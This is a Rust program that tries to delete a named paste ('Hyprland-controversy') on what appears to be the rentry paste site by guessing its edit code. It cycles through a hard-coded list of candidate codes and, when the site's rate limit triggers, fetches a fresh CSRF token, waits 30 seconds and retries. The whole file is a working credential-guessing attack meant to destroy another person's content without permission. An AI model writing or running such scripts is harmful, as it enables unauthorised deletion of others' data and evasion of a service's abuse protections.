use std::collections::VecDeque;

use crate::rentry::{build_client, delete_paste, CSRFData, DeleteError};

mod rentry;

const PASTE_NAME: &str = "Hyprland-controversy";

fn main() {
    let client = build_client();
    let mut csrf_data = CSRFData::get(&client, PASTE_NAME);

    let mut edit_codes = VecDeque::from([
        "qwack", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u",
        "v", "w", "x", "y", "z", "a", "b", "c",
    ]);

    while let Some(edit_code) = edit_codes.pop_front() {
        match delete_paste(&client, &csrf_data, edit_code, PASTE_NAME) {
            Ok(_) => {
                println!("Paste deleted successfully with edit code: {edit_code}");
                return;
            }
            Err(e) => match e {
                DeleteError::FormFieldError(msg) if msg == "Invalid edit code." => {
                    println!("Invalid edit code {edit_code}");
                }
                DeleteError::FormFieldError(msg) => {
                    eprintln!("Form error: {msg}");
                    return;
                }
                DeleteError::FormError(msg)
                    if msg == "You have hit the limit, please wait a bit. e345" =>
                {
                    println!("Hit the limit, waiting...");
                    csrf_data = CSRFData::get(&client, PASTE_NAME);
                    std::thread::sleep(std::time::Duration::from_secs(30));
                    edit_codes.push_front(edit_code);
                }
                DeleteError::FormError(msg) => {
                    eprintln!("Form error: {msg}");
                    return;
                }
                DeleteError::RequestFailure(msg) => {
                    eprintln!("Request error (non 2XX): {msg}");
                    return;
                }
                DeleteError::UnexpectedRedirect(msg) => {
                    eprintln!("Unexpected redirect: {msg}");
                    return;
                }
                DeleteError::UnknownFailure(msg) => {
                    eprintln!("Unknown failure: {msg}");
                    return;
                }
                DeleteError::ReqwestError(e) => {
                    eprintln!("Request failed with: {e:?}");
                    return;
                }
            },
        }
    }
}
